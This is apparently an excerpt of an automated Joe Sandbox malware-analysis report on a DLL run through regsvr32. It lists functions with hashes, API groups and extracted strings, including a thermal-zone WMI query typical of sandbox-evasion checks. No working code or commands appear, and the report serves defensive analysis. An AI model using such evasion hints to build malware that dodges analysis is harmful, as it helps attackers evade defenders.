                                                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                    • API String ID: 1804819252-1534286854
                                                                    • Opcode ID: 813c4ee8a044320c83cd0d7a729d0b00980456566e1ead92c277795f05c6ef47
                                                                    • Instruction ID: 5430985205429bb92ba3d97581a01d7eaa469bdfba3a84a52dc1a57bd16bedf3
                                                                    • Opcode Fuzzy Hash: 813c4ee8a044320c83cd0d7a729d0b00980456566e1ead92c277795f05c6ef47
                                                                    • Instruction Fuzzy Hash: 0B418171B8A64783EB10AB11E460AA97BE0EF49BD8F484234DA9D077F9DE3DE545C340
                                                                    Function 00007FFDFB28E6A0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • environment variable not foundenvironment variable was not valid unicode: , xrefs: 00007FFDFB28EAED
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$EnvironmentVariable
                                                                    • String ID: environment variable not foundenvironment variable was not valid unicode:
                                                                    • API String ID: 2691138088-3632183283
                                                                    • Opcode ID: 335b4f973b880afa8172e4930a0d73d7029cb10b69d3ae74776fe86e5a4af0f5
                                                                    • Instruction ID: 127fed11eccf46651fe9b81c7fa86390d27763a44fc5a743989cd0e150702e5e
                                                                    • Opcode Fuzzy Hash: 335b4f973b880afa8172e4930a0d73d7029cb10b69d3ae74776fe86e5a4af0f5
                                                                    • Instruction Fuzzy Hash: 50B19366B06A8385EB24AB21D854BED2365FB05BC8F448436CE6C9B7EDDF7CD2418340
                                                                    Function 00007FFDFB2B6660 Relevance: 10.8, APIs: 7, Instructions: 251COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$FullNamePathmemcmpmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2015650653-0
                                                                    • Opcode ID: c8321181978a4963cae34ea038d7f953b1d95242421ca7f18ca5682775f57a72
                                                                    • Instruction ID: 123fd878e048c75d1c5f5c10951494377528a076541780970f2750409536d176
                                                                    • Opcode Fuzzy Hash: c8321181978a4963cae34ea038d7f953b1d95242421ca7f18ca5682775f57a72
                                                                    • Instruction Fuzzy Hash: 03A1A362B0AA8389EB269B11DC64BF96255FF05BC8F448035CD6C8B7EDDE3CD2448700
                                                                    Function 00007FFDFB2ADE40 Relevance: 10.7, APIs: 7, Instructions: 185COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CurrentDirectoryFileModuleName
                                                                    • String ID:
                                                                    • API String ID: 1505103792-0
                                                                    • Opcode ID: 53ae84dd1857602d04ad9f3a9051b19f53a886f4bf7aa711c71c4e051393cf9c
                                                                    • Instruction ID: bc223ddeda68fa9b55c082914b15c58d1eca2b0f555712806dd52d3a26609d71
                                                                    • Opcode Fuzzy Hash: 53ae84dd1857602d04ad9f3a9051b19f53a886f4bf7aa711c71c4e051393cf9c
                                                                    • Instruction Fuzzy Hash: 7A71F522B0969355FB24AB25D825BBD2269FF14BC8F148131DE6C9B6DDDF6CE2418300
                                                                    Function 00007FFDFB20EC10 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Query$Close$CounterOpenRemove
                                                                    • String ID: LoadUpdateEvent$\System\Cpu Queue Length
                                                                    • API String ID: 1254545005-2417354242
                                                                    • Opcode ID: 45d828bd0206fad47acc67b38ec4db276fcd54069d5b1721df8aaaab19bf8811
                                                                    • Instruction ID: 070d15b79907e03f181053798ed22fe4e58f4c801305c9ed16316632c967629a
                                                                    • Opcode Fuzzy Hash: 45d828bd0206fad47acc67b38ec4db276fcd54069d5b1721df8aaaab19bf8811
                                                                    • Instruction Fuzzy Hash: FD415426A09A4382E750EB15E4617BAA3A0EF843D4F544235F6ED87AEDDF7DD480C700
                                                                    Function 00007FFDFB302850 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: abort$CaptureContextExceptionRaiseUnwind
                                                                    • String ID: CCG
                                                                    • API String ID: 4122134289-1584390748
                                                                    • Opcode ID: ea82f6b06087ce60718abc6ba6b4de118ec52333f66a0ef5de84b6cd79baedbc
                                                                    • Instruction ID: 747265d202ab5499b11f8d88cbca4c9e18736a4a85e5ba96bf9e9ea66ce71732
                                                                    • Opcode Fuzzy Hash: ea82f6b06087ce60718abc6ba6b4de118ec52333f66a0ef5de84b6cd79baedbc
                                                                    • Instruction Fuzzy Hash: 6A318432A49BC686D720AF24E4503AA77B0FBD9788F505225DACC13779DF79D195CB00
                                                                    Function 00007FFDFB217290 Relevance: 9.3, APIs: 6, Instructions: 274COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: FindNextVolumememcpymemset
                                                                    • String ID:
                                                                    • API String ID: 3717567422-0
                                                                    • Opcode ID: 893e2f60b9d4348fc013897b7af0759ed3ea8f91343f5dc91cd62bf81765715d
                                                                    • Instruction ID: 23fec247500d527bafc7a25127a3c991bb801d61019c77be311b8ad48c66191c
                                                                    • Opcode Fuzzy Hash: 893e2f60b9d4348fc013897b7af0759ed3ea8f91343f5dc91cd62bf81765715d
                                                                    • Instruction Fuzzy Hash: 7FC1CF62B1E64391EB20AB119820B7A66A0FF85794F545235EEBD877FEDF3CE5408700
                                                                    Function 00007FFDFB265AA0 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID: [_^A^$tz%
                                                                    • API String ID: 3702945584-1242015645
                                                                    • Opcode ID: 797e1611b7df3e60906837c21a4aba0a3844e2732ac52dfb3dcd776a591eb48a
                                                                    • Instruction ID: 59a667de009954f03e5663f67d0a55525bf0f9b6872d81a5820bf4eaf8f00eb6
                                                                    • Opcode Fuzzy Hash: 797e1611b7df3e60906837c21a4aba0a3844e2732ac52dfb3dcd776a591eb48a
                                                                    • Instruction Fuzzy Hash: A3C1BE21A0DAC685F7265B18E015BF9A3A1FF94784F049231EE9C437B9EF3DE5928740
                                                                    Function 00007FFDFB2BB1A0 Relevance: 9.2, APIs: 6, Instructions: 172fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$CloseFile$CreateErrorInformationLastMappingView
                                                                    • String ID:
                                                                    • API String ID: 2964106993-0
                                                                    • Opcode ID: 46c435033f59a7bf043528f6e285008444851c04b5c2a5e6632f5bc58c1fef0e
                                                                    • Instruction ID: 0e0a40be59b969dd7d0826ee0f6259cddbd7414fd54d920aa17d77e4f6cca2aa
                                                                    • Opcode Fuzzy Hash: 46c435033f59a7bf043528f6e285008444851c04b5c2a5e6632f5bc58c1fef0e
                                                                    • Instruction Fuzzy Hash: DD618026B1A74389FB14EB52A468BAD67A0FF45B84F588035DE6C47BD9DF3CD4428700
                                                                    Function 00007FFDFB222C00 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 255registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber (), xrefs: 00007FFDFB222C1C
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Close$QueryValue
                                                                    • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersionProductNameWindows 10 Windows 11 CurrentBuildNumberCurrentMajorVersionNumber ()
                                                                    • API String ID: 2393043351-1421764643
                                                                    • Opcode ID: 37bdbc64dc4ee0f6554d1c47c5daf685297dccc14b4500a23452d55a4f32dc48
                                                                    • Instruction ID: 59038edde3e856e6b07de7f313aaf5a8e65ef59d1139074e6086d5473cc22b92
                                                                    • Opcode Fuzzy Hash: 37bdbc64dc4ee0f6554d1c47c5daf685297dccc14b4500a23452d55a4f32dc48
                                                                    • Instruction Fuzzy Hash: 90B1A56270E64281FB60AB11E460B6AA7A1FF857C4F948035EE9D87BEDDF3DD0458B00
                                                                    Function 00007FFDFB2149C0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: String$Free$Alloc
                                                                    • String ID: SELECT * FROM MSAcpi_ThermalZoneTemperature$WQL
                                                                    • API String ID: 986138563-2989581318
                                                                    • Opcode ID: 658a9729fa7da1c980123d83f3d7fafd5fe1a0a70849b059b14dfac0b28b85ee
                                                                    • Instruction ID: 616835a12d8fb6f6f24c543b5aca1d31447442c7ee8241d1dcb36b295f89f9e7
                                                                    • Opcode Fuzzy Hash: 658a9729fa7da1c980123d83f3d7fafd5fe1a0a70849b059b14dfac0b28b85ee
                                                                    • Instruction Fuzzy Hash: 51515122709B8692E720DB11F4207AAA7A4FB85798F544134EFED83AE9DF7CD584C740
                                                                    Function 00007FFDFB279AC0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 187COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY$assertion failed: old_left_len + count <= CAPACITY
                                                                    • API String ID: 3510742995-3535459961
                                                                    • Opcode ID: 3147cd9bec5455f8381a4590b6d458bf6c2bccac19a2f16f1c716521a064f311
                                                                    • Instruction ID: 6a608465f365438b06229ac2e42afb6d7e5d7365ad44340c6bbb87cde1ecd3d3
                                                                    • Opcode Fuzzy Hash: 3147cd9bec5455f8381a4590b6d458bf6c2bccac19a2f16f1c716521a064f311
                                                                    • Instruction Fuzzy Hash: 5F918F22A05BC6C5E711CF25E8517F933A4FB58788F508222DE9C577A9EF39E296C300
                                                                    Function 00007FFDFB2273C0 Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Group$BufferEnumFreeInfo
                                                                    • String ID:
                                                                    • API String ID: 1408970584-0
                                                                    • Opcode ID: de2e23d406a60351ee1f1488efb2de6b994ec15f20dea07c54d47d376994b3cc
                                                                    • Instruction ID: 48c666a82e22dc01541fe64f6520c00c73bcb45554404544d046c8e538a6576f
                                                                    • Opcode Fuzzy Hash: de2e23d406a60351ee1f1488efb2de6b994ec15f20dea07c54d47d376994b3cc
                                                                    • Instruction Fuzzy Hash: 6A616F2270EA4286FB609A15E550B6AB7A0FB85784F944035EEAD877FCDF7CE841C740
                                                                    Function 00007FFDFB22EBC0 Relevance: 7.6, APIs: 5, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: free$realloc
                                                                    • String ID:
                                                                    • API String ID: 3347955621-0
                                                                    • Opcode ID: 30e183f32c5a1b91f64513b32134c7c85a39b5a2d9b63cc12b0367f48bc863b8
                                                                    • Instruction ID: 5d1e1f517c9d6e69941d12a8804b035abf47bf878497e9fd80cf7ffb2f87f4b2
                                                                    • Opcode Fuzzy Hash: 30e183f32c5a1b91f64513b32134c7c85a39b5a2d9b63cc12b0367f48bc863b8
                                                                    • Instruction Fuzzy Hash: 1451E422B0A78782F710AB11E5507BA67A4EB84784F545134EEED47BE9EF3CE485C300
                                                                    Function 00007FFDFB2AF180 Relevance: 7.6, APIs: 5, Instructions: 123COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CompareOrdinalOverlappedResultString
                                                                    • String ID:
                                                                    • API String ID: 1037094402-0
                                                                    • Opcode ID: b5b8a6445f965e287ab3a70ddeb87559af975b7d62a191e1c959eff2ef60592b
                                                                    • Instruction ID: da2bf30532a8db291271a12c700e1c2f7f9a4f84ef8b8dd61c155c1b60ca285e
                                                                    • Opcode Fuzzy Hash: b5b8a6445f965e287ab3a70ddeb87559af975b7d62a191e1c959eff2ef60592b
                                                                    • Instruction Fuzzy Hash: BB419136B0AB429AE714AB11D8607BC27A4FB48B88F544131DE9D877E9DF7CE542C300
                                                                    Function 00007FFDFB22C20F Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000010.00000002.2336661010.00007FFDFB201000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFB200000, based on PE: true
                                                                    • Associated: 00000010.00000002.2336531618.00007FFDFB200000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337174074.00007FFDFB304000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337229740.00007FFDFB305000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337559759.00007FFDFB3FB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337653182.00007FFDFB3FC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337740712.00007FFDFB3FE000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000010.00000002.2337834437.00007FFDFB401000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_16_2_7ffdfb200000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: BufferFree$Return$memcmp
                                                                    • String ID:
                                                                    • API String ID: 3486352366-0
